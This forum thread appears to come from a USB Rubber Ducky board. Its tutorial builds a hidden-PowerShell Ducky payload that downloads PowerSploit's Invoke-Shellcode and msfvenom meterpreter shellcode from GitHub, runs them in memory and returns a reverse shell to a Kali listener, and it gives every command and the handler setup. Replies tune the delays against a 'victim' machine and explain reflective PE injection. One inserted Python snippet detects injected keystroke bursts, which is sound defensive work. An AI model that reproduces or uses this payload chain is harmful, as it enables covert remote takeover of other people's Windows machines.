Posted (edited)

Hello again friends! Today I will give a tutorial on how to create a payload that executes in under 10 seconds and gives you a fully functioning meterpreter shell back to your Kali Linux machine. This is done in under 20 lines of script. It's quite simple and works on any Windows machine with PowerShell installed (Windows 7 and above come with it preinstalled). I tested this first on my Windows 10 machine and it works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin, shall we?

STEP 1: Fire up Kali Linux and open a terminal. Using msfvenom we are going to create a shellcode. Enter this code:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt

The first part, "msfvenom", indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine; open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080 or 4444. They all work. The -f parameter writes the shellcode in PowerShell format (obviously, since we're using PowerShell). And the last part after the ">" indicates the location where this payload will be saved.

STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer).

Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that!

STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines.

DELAY 500
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
STRING powershell -WindowStyle hidden 
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
ENTER 
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp')
ENTER
DELAY 1000
STRING Invoke-Shellcode -Shellcode ($buf) -Force
ENTER 

What is going on here is we are calling the Windows + X button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up PowerShell, BUT IT OPENS IT UP HIDDEN. So the actual PowerShell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After PowerShell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, for the second IEX string, you want to replace the last link with whatever the link to your script is on your GitHub account. Remember the one you uploaded? On GitHub you want to click the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code.

To set up the listener, open up a terminal in Kali.

>msfconsole
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_https
>set LHOST XXX (whatever IP you used, which would be your kali machine IP)
>set LPORT XXX (whatever port you used)
>exploit

And there you go! Of course, have your listener running before doing the attack. If you have any questions, please comment! This is my first actual tutorial, so feedback is wanted.

Edited by GunZofPeace
Posted

Very good. I think the pastebin is better in this case because you can post anonymously, but it's just my opinion...

Do you think this will work with the meterpreter/reverse_tcp ? 

Posted

Any workarounds on initial run of powershell taking up so much time to open the uac dialog? Either choosing longer payload execution time or plugging in twice.

Posted
5 hours ago, henna3 said:

Nice script man!, quick question

Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? 

Thanks!

I'm not sure. I don't see why you would do that though if the shellcode already gives you a meterpreter shell. I think the .exe has to be able to be converted into a powershell format, but google it! Sorry I can't help you with this

Posted
5 hours ago, kbeflo said:

Any workarounds on initial run of powershell taking up so much time to open the uac dialog? Either choosing longer payload execution time or plugging in twice.

So for this script I have the DELAY numbers quite high. It all depends on the computer specs, like how fast it is able to start up PowerShell, enter the commands, etc. Try lowering the DELAY numbers by half. It improves the speed greatly! Just test the script with different DELAYs and see how fast you can get your (or the victim's) computer to run the commands. Try putting 250 for the first four DELAYs. That should run it a lot quicker!
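The DELAY tuning discussed here changes how quickly the Ducky gets through the script, but not the one property a defender can key on: each STRING line is typed as a single burst with near-constant, very short gaps between keys, far faster than a person types, and DELAY only separates lines. An endpoint agent that sees timestamped keyboard events can use that cadence as a heuristic. The Python below is an added example, not part of this thread or of any Hak5 tool; it assumes a feed of (timestamp in seconds, key) pairs, and the event sequences and thresholds in it are constructed.

```python
"""Heuristic keystroke-injection detection from typing cadence.

Added example for this page; not part of this thread or of any Hak5 tooling.
Assumes an endpoint feed of (timestamp_seconds, key) pairs sorted by time; the
event sequences below are constructed.  A Ducky types each STRING line as one
burst with very short, near-constant inter-key gaps, while DELAY only separates
lines, so we look for long runs of keys arriving faster than a person could type.
"""


def injected_runs(events, max_gap=0.02, min_run=12):
    """Return (start_index, end_index, mean_gap_seconds) for every run of at least
    min_run consecutive keystrokes where each arrives within max_gap of the last.

    Thresholds are example values: 20 ms per key is 50 keys/second, well beyond
    sustained human typing, and 12 keys is enough to ignore short bursts such as
    a key chord or a pasted word.
    """
    runs = []
    start = 0
    for i in range(1, len(events) + 1):
        # a run ends at the last event or when a gap exceeds max_gap
        if i == len(events) or events[i][0] - events[i - 1][0] > max_gap:
            if i - start >= min_run:
                gaps = [events[k][0] - events[k - 1][0] for k in range(start + 1, i)]
                runs.append((start, i - 1, sum(gaps) / len(gaps)))
            start = i
    return runs


def typed(text, start, gap):
    """Constructed keyboard events: one key per character, evenly spaced."""
    return [(start + n * gap, ch) for n, ch in enumerate(text)]


# Constructed sample: a person typing a command at about 5.5 keys/second, then a
# 250 keys/second burst of the kind a Ducky STRING line produces.
HUMAN_TYPING = typed("dir C:\\Users", 0.0, 0.18)
INJECTED_BURST = typed("powershell -WindowStyle hidden", 5.0, 0.004)
SAMPLE_EVENTS = HUMAN_TYPING + INJECTED_BURST

if __name__ == "__main__":
    for start, end, mean_gap in injected_runs(SAMPLE_EVENTS):
        text = "".join(key for _, key in SAMPLE_EVENTS[start:end + 1])
        print(f"burst of {end - start + 1} keys at {mean_gap * 1000:.1f} ms/key: {text!r}")
```

Shorter lines such as the single "a" in the script fall below min_run on purpose; the cadence check is meant to catch the typed command lines, and a real agent would combine it with the appearance of a new HID keyboard device and with the process-creation events that follow. Lowering DELAY, as suggested above, shortens the pauses between lines but leaves the per-key cadence untouched.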

  • 1 month later...
Posted
On 7.2.2017 at 7:39 AM, GunZofPeace said:

DELAY 500
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
STRING powershell -WindowStyle hidden 
ENTER
DELAY 1000

I think it's possible to replace this code with:

DELAY 500
GUI R
STRING powershell -WindowStyle hidden
ENTER
DELAY 1000

It's a little bit shorter and saves time :)

  • 1 month later...
Posted
On 2/8/2017 at 8:17 AM, henna3 said:

Nice script man!, quick question

Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? 

Thanks!

If it is unmanaged code, you can do it with PowerSploit's Invoke-ReflectivePEInjection.ps1. The exe will need to be read in as a byte array to be used. You can load the PowerSploit module into memory and then load your own script that will handle pulling down the exe that you already converted to a byte array and then to base64 encoding to transfer. Decode back to a byte array and then inject into your current process or select one, with the arguments of the exe if any.

If it is managed, you might be able to do it with reflection assembly loading, but I have only done this with .NET DLLs; I do not know if it works with .NET exes.

If you really want the shellcode, it has to be unmanaged code (C, C++, no .NET). You can use a disassembler to get the op codes or use a C compiler to dump the object, which will have the op codes. There are tutorials online on how this is done in more detail both ways. Anyway it goes, you may have to mess with it to get rid of nulls for it to be workable shellcode. The first two options involve no shellcoding and no disk touching. It looks like the primary use of this topic is to use meterpreter shellcode, which msf can create for you easily. If you want to easily create shellcode to execute something, take a look at msf's payload windows/exec, which can compile an unmanaged exe or even shellcode, I believe.

  • 1 month later...
Posted

Hi! Thank you for your post.

I am very new to all this and I could really use some help. I followed your instructions, so I got Metasploit to start the handler, but it does not create a session. I did not get any errors, but it seems that the scripts, which are supposed to be running on Windows, are not communicating back to the handler (that's at least what I think is happening). The problem might be because I saved the cmd code as .bat and .cmd. I ran them both but did not notice in Task Manager that either of them started a shell. Not sure what I am doing wrong, but if anybody has any idea it would be much appreciated. Thank you.

  • 4 years later...
  • 1 month later...
Posted
On 2/7/2017 at 7:39 AM, GunZofPeace said:

GUI x

I'm trying to test this script on my Windows 11 for testing, but when using GUI x it'll start Settings and goes to rename the PC (and then executes the commands as the new PC name).
Should it be something other than GUI x in Windows 11 for getting access to PowerShell?
